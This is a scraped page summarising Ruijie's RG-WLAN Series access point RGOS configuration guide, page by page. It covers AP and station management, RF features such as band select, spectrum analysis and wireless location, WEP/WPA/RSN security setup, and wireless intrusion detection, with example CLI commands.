Ruijie RG-WLAN Series Rgos Configuration Manual
  1. Manuals
  2. Brands
  3. Ruijie Manuals
  4. Wireless Access Point
  5. RG-WLAN Series
  6. Rgos configuration manual

Ruijie RG-WLAN Series Rgos Configuration Manual

Hide thumbs Also See for RG-WLAN Series:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
Table of Contents

Advertisement

Quick Links

See also: Configuration Manual
RG-WLAN Series Access Point
RGOS Configuration Guide, Release 11.1(5)B8

Advertisement

Table of Contents
loading
Need help?

Need help?

Do you have a question about the RG-WLAN Series and is the answer not in the manual?

Questions and answers

Related Manuals for Ruijie RG-WLAN Series

Summary of Contents for Ruijie RG-WLAN Series

  • Page 1 RG-WLAN Series Access Point RGOS Configuration Guide, Release 11.1(5)B8...
  • Page 2 This document is provided “as is”. The contents of this document are subject to change without any notice. Please obtain the latest information through the Ruijie Networks website. Ruijie Networks endeavors to ensure content accuracy and will not shoulder any responsibility for losses and damages caused due to content omissions, inaccuracies or errors.
  • Page 3 This manual is intended for:  Network engineers  Technical support and servicing engineers  Network administrators Obtaining Technical Assistance  Ruijie Networks website: http://www.ruijienetworks.com/  Ruijie service portal: http://case.ruijienetworks.com Related Documents Documents Description Describes the related configuration commands, including command modes, Command Reference parameter descriptions, usage guides, and related examples.
  • Page 4 · Symbols Means reader take note. Notes contain helpful suggestions or references. Means reader be careful. In this situation, you might do something that could result in equipment damage or loss of data.
  • Page 5 RG-WLAN Series Access Point RGOS Configuration Guide, Release 11.1(5)B8 WLAN Basic Configuration 1. Configuring AP Management 2. Configuring STA Management 3. Configuring Ethernet Management 4. Configuring Data Plane 5. Configuring WLAN Log...

  • Page 6: Figure

    Configuration Guide Configuring AP Management 1 Configuring AP Management 1.1 Overview 1.2 Application 1.3 Features Basic Concepts  AP is an access point used by wireless terminals to access a wired network. It is equivalent to a bridge for communication between wireless terminals and a wired network.

  • Page 7: Figure

    After the AP mode is switched between the fit and fat AP modes, the AP must be restarted to ensure the configuration consistency. For WALL-APs supplied by Ruijie Networks, when the fat AP mode is used, the default IP address of rear...
  • Page 8 Configuration Guide Configuring AP Management  Steps Run the ap-mode command. Ruijie(config)#ap-mode fit Verification On the AP, run the show ap-mode command to check the current mode of the AP. Ruijie#show ap-mode current mode: fit Common Errors  None 1.5 Monitoring...

  • Page 9: Association Control

    Configuration Guide Configuring STA Management 2 Configuring STA Management 2.1 Overview STA Management (STAMG) implements station (STA) management, including STA access control management and STA event notification. Event notification is mainly used to serve other function modules. Applications of the STAMG functions are as follows: ...
  • Page 10 Configuration Guide Configuring STA Management signals travel in the space. When E-bags are used in two adjacent classrooms at the same time, the ideal condition is that all the teacher and student terminals are associated with the AP of their own classrooms so that the two classrooms will not interfere with each other.
  • Page 11 Configuration Guide Configuring STA Management Notes  When a package is deleted, all its related configurations are deleted as well. If some STAs in this package are currently associated, all these STAs will be deassociated.  A package can only be configured with one primary STA. If the information about the primary STA in the package is configured for multiple times, the latest configuration prevails.
  • Page 12 Configuration Guide Configuring STA Management Mode Usage Guide Command secondary-sta mac-address mac-address: indicates the MAC address of the STA. Parameter Description Defaults No secondary STA is configured by default. Command Package configuration mode Mode Usage Guide  Configuring an Association Control Zone ...
  • Page 13 Configuration Guide Configuring STA Management  Enable the association control function. Command assoc-control Parameter Description Defaults The association control function is disabled by default. Command Global configuration mode Mode Usage Guide Verification  Verify that secondary STAs can be associated with APs in the same group as the primary STA. Configuration Example ...
  • Page 14 Configuration Guide Configuring STA Management AP1(config-czone)# exit AP1(config)#assoc-control AP3#configure terminal Enter configuration commands, one per line. End with CNTL/Z. AP3 (config)# package Cart 1 AP3(config-package)#primary-sta 00d0.f800.0001 AP3(config-package)#secondary-sta 00d0.f800.0002 AP3(config-package)#secondary-sta 00d0.f800.0003 AP3(config-package)# exit AP3(config)# control-zone Classroom 2 AP3(config-czone)# apAP3 AP3(config-czone)# exit AP3(config)#assoc-control ...
  • Page 15 Configuration Guide Configuring STA Management Association control is enabled. AP3# show package ========= Cart 1 ========= primary STA : 00d0.f800.0001 secondary STA num : 2 00d0.f800.0002 00d0.f800.0003 AP3# show assoc-control control zone num : 1 control-zoneAP ------------- ------------------------ Classroom 1 AP3 00d0.f800.889f Common Errors ...
  • Page 16 Configuration Guide Configuring Ethernet Management 3 Configuring Ethernet Management 3.1 Overview Ethernet Management (ETH-MNG) is an AP wired parameter management service used to configure wired parameters of APs. The LAN port bandwidth restriction function, as a fundamental service of ETH-MNG, is used to configure the maximum bandwidth of various LAN ports of APs, so as to avoid the slow Internet access of wireless users in a scenario where wireless and wired users coexist and wired users occupy a substantial bandwidth.
  • Page 17 Configuration Guide Configuring Ethernet Management 3.3.2 LAN port Bandwidth Restriction 3.3.2.1 Working Principle The LAN port bandwidth restriction function is used to configure the maximum bandwidth of various LAN ports of APs so as to avoid the slow Internet access of wireless users caused in a scenario where wireless and wired users coexist and wired users occupy a substantial bandwidth.
  • Page 18 Configuration Guide Configuring Ethernet Management  Run the wired-rate command to configure the maximum bandwidth of various LAN ports. Command wired-rate value Parameter Description Defaults By default, the maximum bandwidths of various LAN ports are not limited. Command Mode Interface configuration mode Usage Guide 3.4.1.4 Verification ...
  • Page 19 Configuration Guide Configuring Data Plan 4 Configuring Data Plan 4.1 Overview The data plane provides broadcast forwarding control functions, including broadcast forwarding weight control and broadcast wireless forwarding control. Broadcast forwarding weight control means restricting the weights of packet types for broadcast forwarding, so as to prevent STAs from being influenced when a certain type of packets occupy all resources.
  • Page 20 Configuration Guide Configuring Data Plan 4.3.2 Overview Feature Description Broadcast Forwarding Restricts the weights of packet types for broadcast forwarding, so as to protect RF resources from Weight Control being occupied by a certain type of packets and thereby guarantee normal forwarding of other packets.
  • Page 21 Configuration Guide Configuring Data Plan 4.4 Configuration Configuration Description and Command Broadcast Forwarding Optional configuration. Set the weights of packet types for broadcast forwarding. Weight Control Configures the weights of packet types for data-plane queue-weight broadcast forwarding on the AP. Broadcast Wireless Optional configuration.
  • Page 22 Configuration Guide Configuring Data Plan Command data-planequeue-weightunicast-packet-weightmulticast-packet-weightbroadcast-packet-weightunknow n-multicast-packet-weightunknown-unicast-packet-weight Parameter unicast-packet-weight: sets the forwarding weight of unicast packets. The range is from 1 to 100 Description multicast-packet-weight: sets the forwarding weight of multicast packets. The range is from 1 to 50 broadcast-packet-weight: sets the forwarding weight of broadcast packets.
  • Page 23 Configuration Guide Configuring Data Plan 4.4.2.4 Verification  Run the show run command to display configuration information. 4.5 Monitoring ...
  • Page 24 Configuration Guide Configuring WLAN Log 5 Configuring WLAN Log 5.1 Overview WLOG (WLAN Log) enables storing and viewing wireless network and STA status in a past period of time. By collecting and storing the information of STA in the past 24 hours and then displaying the information through CLI commands, WLOG allows users to analyze the wireless network status and troubleshoot problems.
  • Page 25 Configuration Guide Configuring WLAN Log Number of associated online STAs Number of online STAs which have passed Web authentication Number of online STAs which have passed 802.1x authentication Intensity of the co-channel interference signal Number of received error frames Packet retransmission times ...
  • Page 26 Configuration Guide Configuring WLAN Log Feature Description Enabling the WLOG You can enable the WLOG feature to automatically collect AP and STA information. Feature 5.3.1 Enabling the WLOG Feature After the WLOG feature is enabled, the AP automatically collects AP and STA information and records the information into memory, enabling users, with provided information, to have a more accurate understanding of the wireless network and STA status in the past 24 hours and analyze and troubleshoot problems.
  • Page 27 Configuration Guide Configuring WLAN Log Mode Usage Guide Verification  Run the show wlan diag sta command to check whether the STA information can be viewed on the AP. Common Errors  5.5 Monitoring Displaying Description Command Displays the STA information on the show wlan diag sta [ sta-mac sta-mac ] [ number number ]...
  • Page 28 RG-WLAN Series Access Point RGOS Configuration Guide, Release 11.1(5)B8 WLAN RF Configuration 1 Configuring RF Scheduling 2 Configuring Band Select 3 Configuring Smartant 4 Configuring FSS 5 Configuring Wireless Location...
  • Page 29 Configuration Guide Configuring RF Scheduling 1 Configuring RF Scheduling 1.1 Overview The radio frequency (RF) resources mentioned in this document include the RF of an Access Point (AP) as well as a wireless local area network (WLAN) services. RF scheduling can perform automatic management on the RF resources. RF scheduling can be used to disable the RF of an AP or a WLAN in the specified time interval, realizing the following functions: ...
  • Page 30 Configuration Guide Configuring RF Scheduling Working Principle Before using the scheduling function, a scheduling session needs to be created first to specify the time for RF scheduling. Then the scheduling session can be applied to an AP RF interface or WLAN. ...
  • Page 31 Configuration Guide Configuring RF Scheduling When the scheduling session starts or ends, the system sends a scheduling message. In the handling of the scheduling message, the processing logic will locate the WLAN where this scheduling session is applied to, and enable or disable the WLAN.
  • Page 32 Configuration Guide Configuring RF Scheduling Configuration Steps  Creating a Scheduling Session  (Mandatory)Run the schedule session sid command to create a scheduling session. sid indicates Session ID, which can be set to a value ranging from 1 to 8 on a fat AP. ...
  • Page 33 Configuration Guide Configuring RF Scheduling  Command schedule session sid Parameter sid: Indicates Session ID. It can be set to a value ranging from 1 to 8 on a fat AP. Description Defaults No scheduling session is applied. Command WLAN configuration mode or interface configuration mode Mode Usage Guide Verification...
  • Page 34 Configuration Guide Configuring RF Scheduling  Specifying the Time Interval for a Scheduling Session  Mandatory.  Command schedule session sid time-range n period day1 [ to day2 ] time hh1:mm1 to hh2:mm2 Parameter session sid: Indicates Session ID. It can be set to a value ranging from 1 to 8 on a fat AP. Description time-range n: Indicates the number of a time interval, which ranges from 1 to 8.
  • Page 35 Configuration Guide Configuring Band Select 2 Configuring Band Select 2.1 Overview Band Select is a technology for optimizing access band distribution for STAs on a WLAN. The Band Select function leads dual-band STAs to access the higher-capacity 5 GHz band to reduce the pressure on the 2.4 GHz band and improve user experience.
  • Page 36 Configuration Guide Configuring Band Select  Active scanning: The STA broadcasts a Probe Request frame on all channels of all supported bands. After receiving the Probe Request frame, the APs providing WLAN access service sends a Probe Response frame including some WLAN information to the STA.
  • Page 37 Configuration Guide Configuring Band Select  If the AP can receive the Probe Request frame from an STA both at the 2.4 GHz band and the 5 GHz band, this STA is a dual-band STA.  If the AP can receive the Probe Request frame from this STA only at the 5 GHz band, the AP learns that this STA is a 5 GHz STA.
  • Page 38 Configuration Guide Configuring Band Select  Active Scanning Before the Band Select Function Identifies STA Types If the Band Select function is enabled for a WLAN, the WLAN may have different responses to active scanning of an STA. Before STA types are identified: ...
  • Page 39 Configuration Guide Configuring Band Select whether the STA sends two frames within the same scanning cycle or sends the two frames in two consecutive scanning cycles. If the AP sets the minimum scanning cycle of the STA to 200 milliseconds, the two frames are considered to be sent within the same scanning cycle because their interval is shorter than 200 milliseconds.
  • Page 40 Configuration Guide Configuring Band Select function plays only the "leading" role during STA access and has a low priority. When the Band Select function conflicts with other functions, the other functions shall prevail. 2.4 Configuration The band select function is not supported on the following AP products: AP110-W, AP220-I v1.x, AP220-SI v1.x, AP220-E v2.x, AP220-SH v2.0, AP220-SH (C) v3.0, AP220-E(M) v2.x, AP620-H(C) v2.x, AP220-E(C) v3.0, AP220-SH(C) v2.99, AP220-E(C) v2.99.
  • Page 41 Configuration Guide Configuring Band Select The Band Select function is disabled. Defaults Command WLAN configuration mode Mode Usage Guide  Configuring the Minimum RSSI for the Band Select Function  (Optional) It is configured when you want to adjust the coverage of the Band Select function. ...
  • Page 42 Configuration Guide Configuring Band Select Command band-select age-out { dual-band value | suppression value } Parameter dual-band value: Specifies the aging time of dual-band STA information, ranging from 20 to 120 Description seconds. suppression value: Specifies the aging time of inhibition STA information, ranging from 10 to 60 seconds.
  • Page 43 Configuration Guide Configuring Band Select Verification  Run the show band-select configuration command to display parameters of the Band Select function.  Run the show running-config command to check whether the Band Select function is enabled.  After a period of running, run the show band-select statistics command to check the statistics on the AC. ...
  • Page 44 Configuration Guide Configuring Smartant 3 Configuring Smartant 3.1 Overview Smartant means smart antenna, also known as auto-sensing antenna array. It is composed of three parts: antenna array, beam forming network, and beam forming algorithm. By adopting algorithms meeting certain criteria, Smartant adjusts the weighted amplitude and phase of each array signal and thereby adjusts the radiation pattern of the antenna array to enhance required signals and suppress interference signals.
  • Page 45 Configuration Guide Configuring Smartant Through downlink packet training and sampling by the AP, an optimal transmission path is found to avoid interferences and obstacles. 3.4 Configuration Configuration Description and Command Enabling the Smartant (Optional) It is used to configure the Smartant function. function smartant enable radio Configures Smartant.
  • Page 46 Configuration Guide Configuring Smartant 3.5 Monitoring Displaying Description Command Displays AP configuration. show running...
  • Page 47 Analysis 4.2.1 Networking with the SNC Software to Achieve Frequency Spectrum Analysis Scenario Ruijie's SNC software achieves frequency spectrum analysis. The SNC software is networked with Ruijie's wireless AP system, as shown in Figure 4-1:  There are non-802.11 wireless interference devices such as microwave ovens and cordless phones in the RF environment.
  • Page 48 Configuration Guide Configuring FSS Deployment  Enable frequency spectrum analysis on the AP.  Establish a connection between the SNC software and the AP. 4.3 Features Basic Concepts  Video Bridge Interference During operation, a video bridge may generate wireless signals that interfere with WLAN transmission. The FSS of an AP can recognize and send the video bridge interferences to the SNC software for analysis.
  • Page 49 Fourier Transform (FFT). Then the AP classifies the information for processing, recognizes and sends specific interference sources to the SNC software via the agreed protocol. After receiving information, the SNC software sorts out and displays the interference information in various ways. For specific operations, refer to Ruijie's user manual for the SNC software.
  • Page 50 Ruijie(config)# spectral enable Ruijie(config)# end Verification Run the show running-config command to verify that FSS is enabled on the target AP. Ruijie# show running config spectral enable Common Errors  This command is used in the all AP configuration mode.
  • Page 51 Configure the frequency spectrum scanning precision for video bridges as 2. n Steps Ruijie# configure terminal Ruijie(config)# spectral enable Ruijie(config)# spectral stability vbr 2 Ruijie(config)# end Verification Run the show running-config command to verify the frequency spectrum scanning precision on the target AP.
  • Page 52 Configure the frequency spectrum scanning precision for video bridges as 2. Configuratio n Steps Ruijie# configure terminal Ruijie(config)# spectral enable Ruijie(config)# spectral stability vbr 2 Ruijie(config)# end Verification Run the show running-config command to verify the frequency spectrum scanning precision on the target AP.
  • Page 53 Configure the frequency spectrum scanning duration as 10 μs.  Configuratio n Steps Ruijie# configure terminal Ruijie(config)# spectral enable Ruijie(config)# spectral period 10 Ruijie(config)# end Verification Run the show running-config command to verify the scanning duration configured on the target AP. Ruijie# show running-config spectral enable...
  • Page 54 MUs, 802.11-complicant wireless STAs regularly transmitting wireless signals.  Receiver The Receiver can be a Ruijie AP or an AeroScout Tag exciter (used not to collect locations but to excite the TAGs to transmit specified wireless signals).  Backend Location System The Backend Location System includes a Locator, AeroScout Engine (AE) computing software and all kinds of graphic programs.
  • Page 55 Configuration Guide Configuring Wireless Location Feature Description Enables WL for APs. 5.3.1 WL Working Principle Based on the measurement of RSSI from an MU received by a base station (BS) and the channel transmission model, the distance between them can be estimated to be d. In this way, for a BS (i), the MU must be on the circle centered at BS (i) with a radius of d.
  • Page 56 Configuration Guide Configuring Wireless Location Configuration Description and Command (Optional) It is used to optimize the WL transmission. wlocation compound enable Enables the WL aggregation. wlocation send-mu-time Configures the interval for sending MU location information on a specified AP. Configures the interval for sending TAG location wlocation send-tag-time information on a specified AP.
  • Page 57 Configuration Guide Configuring Wireless Location  The commands for configuring the IP address and PID are wlocation ae-ip ip-address and wlocation ae-port port respectively. Command wlocation ae-ip ip-address Parameter ip-address: IP address of the Locator Description No IP address is configured for the Locator. The AE server's default IP address is 0.0.0.0. Defaults Wlocation configuration mode Command...
  • Page 58 Configuration Guide Configuring Wireless Location  In the scenarios with a lot of STAs to be located, reduce the interval to avoid information losses. (An AP can cache 500 to 700 pieces of location information.) Command wlocation send-mu-time interval Parameter interval: time interval, ranging from 100 to 5,000 ms Description The default interval is 300 ms.
  • Page 59  Use this command where there is a requirement for lower traffic bandwidth, and the deployed location system interconnects with the location server developed by Ruijie Networks. Except as otherwise noted, you can apply the configuration on your demand. Command...
  • Page 60 RG-WLAN Series Access Point RGOS Configuration Guide, Release 11.1(5)B8 WLAN Security Configuration 1. Configuring RSNA 2. Configuring WIDS 3. Configuring CPU Protection 4. Configuring NFPP 5. Configuring WAPI...
  • Page 61 Configuration Guide Configuring RSNA 1 Configuring RSNA 1.1 Overview The Robust Security Network Architecture (RSNA) function provides security mechanisms for WLANs. A WLAN uses open media and public electromagnetic waves as a carrier to transmit data signals. Neither communication party is connected with a cable. If transmission links are not properly protected through encryption, data transmission will be at great risk.

  • Page 62: Wep Encryption

    Configuration Guide Configuring RSNA 1.2.1 WEP Encryption Scenario In a small WLAN that has a lower requirement for security, WEP encryption can be used. WEP encryption can use the open-system or shared-key link authentication mode. Their differences are as follows: ...
  • Page 63 Configuration Guide Configuring RSNA Deployment  Configure a WLAN on the AP1 and AP2.  Configure PSK authentication in WLAN security configuration mode on the AP devices.  Use this authentication with WEB authentication to support web-based authentication and charging. 1.2.3 802.1X Access Authentication Scenario In a scenario that has a higher requirement for security, 802.1X authentication can be used.
  • Page 64 Configuration Guide Configuring RSNA Figure 1-3 L2/L3 Network Authentication Server AC(802.1X L2/L3 Network Authentication) Deployment  Configure a WLAN on the AP1 and AP2.  Configure an authentication server on the AP1 and AP2.  Configure 802.1X authentication in WLAN security configuration mode on the AP devices. 1.3 Features Basic Concepts ...
  • Page 65 Configuration Guide Configuring RSNA  CCMP Counter CBC-MAC Protocol (CCMP) uses AES, which is safer than TKIP.  Authentication and Key Management (AKM) is an access authentication mode for users to access a WLAN. Overview Feature Description Link Verification Verify the security of a wireless link before an STA associates with a WLAN. Access Authentication Perform authentication for an STA that accesses a WLAN.

  • Page 66: Access Authentication

    Configuration Guide Configuring RSNA  Shared-key Link Authentication Shared-key link authentication is another authentication mechanism in addition to the open-system link authentication. Shared-key link authentication requires that the same shared key be configured for an STA and an AP. The shared-key link authentication can be configured only in static WEP encryption whereas the open-system link authentication is available in all the other modes.
  • Page 67 Configuration Guide Configuring RSNA Pre-shared Key (PSK) is an 802.11i authentication mode, which performs authentication with pre-defined static keys. This authentication approach requires that an STA and an AP be configured with the same pre-shared key. If their keys are the same, the PSK access authentication succeeds;...
  • Page 68 Configuration Guide Configuring RSNA WEP uses the RC4 algorithm to promote data privacy and implements authentication by using a shared key. WEP does not specify a key management scheme. Generally, keys are configured and maintained manually. WEP that does not provide a key distribution mechanism is called manual WEP or static WEP.
  • Page 69 Configuration Guide Configuring RSNA Configuration Description and Command security static-wep-key authentication Configures the link authentication mode of static WEP. (Mandatory) It is used to enable WPA authentication. security wpa Configures WPA authentication. security wpa ciphers Configures the encryption mode of WPA authentication.

  • Page 70: Configuring Static Wep

    Configuration Guide Configuring RSNA Configuration Description and Command authtimeout pairtime Configures the timeout duration of unicast key negotiation packets. Configures the jitter prevention time of WEB webauth prevent-jitter authentication. 1.4.1 Configuring Static WEP Configuration Effect  Enable static WEP encryption and provide WEP encryption protection for WLAN data. ...

  • Page 71: Ap Ruijie(Config)#Wlansec

    Access the security configuration mode of WLAN 1.  Steps Enable static WEP encryption and configure a WEP key.  Set the link authentication mode to shared-key link authentication. Ruijie(config)#wlansec 1 Ruijie(config-wlansec)#security static-wep-key encryption 40 ascii 1 12345 Ruijie(config-wlansec)#security static-wep-key authentication share-key...
  • Page 72 Configuring RSNA Verification Run the show running-config | begin wlansec wlan_id command to check whether the configuration takes effect. Ruijie#show running-config | begin wlansec 1 wlansec 1 security static-wep-key encryption 40 ascii 1 12345 security static-wep-key authentication share-key Common Errors ...
  • Page 73 Configuration Guide Configuring RSNA When WPA authentication is used, the encryption mode and access authentication mode must also be configured. If either the encryption mode or the access authentication mode is configured or neither of them is configured, STAs cannot access a WLAN. ...
  • Page 74 Configuration Guide Configuring RSNA Only one access authentication mode can be enabled for a WLAN in security configuration mode.  Configuring a Shared Key for WPA Authentication  (Optional) It must be configured when WPA PSK authentication is enabled.  It is configured in WLAN security configuration mode on the AP.
  • Page 75 Ruijie(config)#wlansec 1 Ruijie(config-wlansec)#security wpa enable Ruijie(config-wlansec)#security wpa ciphers aes enable Ruijie(config-wlansec)#security wpa akm psk enable Ruijie(config-wlansec)#security wpa akm psk set-key ascii 12345678 Verification Run the show running-config | begin wlansec wlan_id command to check whether the configuration takes effect. Ruijie#show running-config | begin wlansec 1...
  • Page 76 Configuration Guide Configuring RSNA Notes  When RSN authentication is used, the encryption mode and access authentication mode must also be configured.  If the access authentication mode is set to PSK, a PSK key must be configured.  In the security mode of a WLAN, RSN authentication cannot be configured with WEP authentication. Configuration Steps ...
  • Page 77 Configuration Guide Configuring RSNA The AES and TKIP encryption modes can be enabled at the same time in WLAN security configuration mode.  Configuring the Access Authentication Mode of RSN Authentication  Mandatory.  It is configured in WLAN security configuration mode on the AP. ...
  • Page 78 Ruijie(config)#wlansec 1 Ruijie(config-wlansec)#security rsn enable Ruijie(config-wlansec)#security rsn ciphers aes enable Ruijie(config-wlansec)#security rsn akm psk enable Ruijie(config-wlansec)#security rsn akm psk set-key ascii 12345678 Verification Run the show running-config | begin wlansec wlan_id command to check whether the configuration takes effect. Ruijie#show running-config | begin wlansec 1...
  • Page 79 Configuration Guide Configuring RSNA Common Errors  The WLAN has been enabled with other encryption and authentication modes (such as WEP).  An RSN encryption mode is configured before RSN authentication is enabled in WLAN security configuration mode.  An access authentication mode is configured before RSN authentication is enabled in WLAN security configuration mode.
  • Page 80 Ruijie(config)#wlansec 1 Ruijie(config-wlansec)#dot1x-mab Verification Run the show running-config | begin wlansec wlan_id command to check whether the configuration takes effect. Ruijie#show running-config | begin wlansec 1 wlansec 1 dot1x-mab Common Errors  The WLAN has been enabled with other encryption and authentication modes (such as WEP).
  • Page 81 Configuration Guide Configuring RSNA 1.4.5 Configuring Authentication Parameters Configuration Effect  Configure key interaction parameters.  Configure the jitter prevention time in WEB authentication. Notes  Key interaction parameters take effect only in PSK or 802.1X authentication.  The jitter prevention time in WEB authentication can be configured only after WEB authentication is enabled. Configuration Steps ...
  • Page 82 Configure the PSK access authentication mode for RSN authentication.  Configure the PSK key 12345678.  Set the unicast key negotiation packet re-transmission count to 5.  Configure WEB authentication.  Set the jitter prevention time of WEB authentication to 900 seconds. Ruijie(config)#wlansec 1 Ruijie(config-wlansec)#security rsn enable...

  • Page 83: Ruijie(Config-Wlansec)#Security Rsn Akm Psk Set-Key Ascii

    Configuration Guide Configuring RSNA Ruijie(config-wlansec)#security rsn ciphers aes enable Ruijie(config-wlansec)#security rsn akm psk enable Ruijie(config-wlansec)#security rsn akm psk set-key ascii 12345678 Ruijie(config-wlansec)#authtimeout paircount 5 Ruijie(config-wlansec)#webauth Ruijie(config-wlansec)#webauth prevent-jitter 900 Verification Run the show running-config | begin wlansec wlan_id command to check whether the configuration takes effect.
  • Page 84 Configuration Guide Configuring WIDS 2 Configuring WIDS 2.1 Overview Compared with wired networks, Wireless LAN (WLAN) has unparalleled advantages, such as convenient deployment, flexible use, efficient cost, and easy extension, making it more and more prevalent. However, for the openness of its channels, WLAN is much vulnerable to various network threats, such as rogue access points (APs), Ad-hoc networks, and all types of protocol attacks.
  • Page 85 Configuration Guide Configuring WIDS  AP-based: Communication cannot proceed between layer-2 users under the same AP.  AP-SSID based: Communication cannot proceed between layer-2 users under the same AP and in the same WLAN.  Rogue Containment Modes The Rogue containment has the following four modes: ...
  • Page 86 Configuration Guide Configuring WIDS The whitelist includes MAC addresses of admitted STAs. If the whitelist function is enabled, only the listed can access WLAN, and all packets from other STAs will be directly discarded by the AP, so as to reduce the impact of illegal packets in WLAN. ...
  • Page 87 Configuration Guide Configuring WIDS DDoS detection function performs statistics for the attacker's packets and determines whether the number of packets per second exceeds the configured threshold. If yes, this result will be logged. If the dynamic blacklist function is enabled, the attacker will be added into the dynamic blacklist.
  • Page 88 Configuration Guide Configuring WIDS  AP-based user isolation  AP-SSID based user isolation Working Principle  AP-Based User Isolation Direct communication cannot be conducted between layer-2 STAs associated with the same AP.  AP-SSID based User Isolation Direct communication cannot be conducted between STAs in the same WLAN who are associated with the same AP. 2.3.4 Rogue Detection and Containment Network devices are usually divided into two types: illegal (Rogue) and legal.
  • Page 89 Configuration Guide Configuring WIDS 2.4 Configuration Configuration Description and Command (Optional) It is used to configure frame filtering. kickout threshold Configures the low-rate kickout threshold. Adds an entry to the whitelist. whitelist mac-address whitelist max Configures the length of the whitelist. static-blacklist mac-address Adds an entry to the static blacklist.
  • Page 90 Configuration Guide Configuring WIDS Configuration Description and Command Adds an entry to the permissible MAC list for user user-isolation permit-mac isolation. Configures the length of the permissible MAC list for user-isolation permit-mac max user isolation. (Optional) It is used to set the device detection and containment function. countermeasures enable Enables the Rogue containment function.
  • Page 91 Configuration Guide Configuring WIDS 2.4.1 Configuring Frame Filtering Configuration Effect  Configure the frame filtering rules to provide packet filtering services. Notes  An STA cannot be configured in both the static blacklist and the whitelist.  An STA cannot exist in both the blacklist and whitelist of the same SSID. Configuration Steps ...
  • Page 92 Configuration Guide Configuring WIDS  Run the static-blacklist mac-address command to add an entry to the static blacklist in WIDS configuration mode. The static blacklist filtering function effectively works only after an effective static blacklist entry is configured.  Run the static-blacklist max command to configure the maximum number of entries in the static list in WIDS configuration mode, indicating the maximum number of permissible static blacklist entries on the device.
  • Page 93 Configuration Guide Configuring WIDS  Run the ssid-filter blacklist max command to configure the maximum number of entries in the SSID-based static blacklist in WIDS configuration mode. Command ssid-filter { max num | blacklist mac-address H.H.H in-ssid string | blacklist max num } Parameter max num: Indicates the maximum length of the SSID-based blacklist, ranging from 1 to 128.
  • Page 94 Configuration Guide Configuring WIDS  Check the SSID-based whitelist function. When the SSID-based whitelist is configured, STAs not included in the SSID-based whitelist cannot join this SSID service. Configuration Example 2.4.2 Configuring IDS Configuration Effect  IDS can be used to timely find and defend against malicious or unintentional attacks in WLAN. Notes ...
  • Page 95 Configuration Guide Configuring WIDS Mode Usage Guide  Configuring Flooding Attack Detection  (Optional) Flooding attack detection is disabled by default.  Run the attack-detection flood single-mac { total | assoc | reassoc | disassoc | probe | action | auth | deauth | null-data } thresholdnumintervaltime command to configure the threshold and interval of a specified type of packets for single-STAflooding attack in WIDS configuration mode.
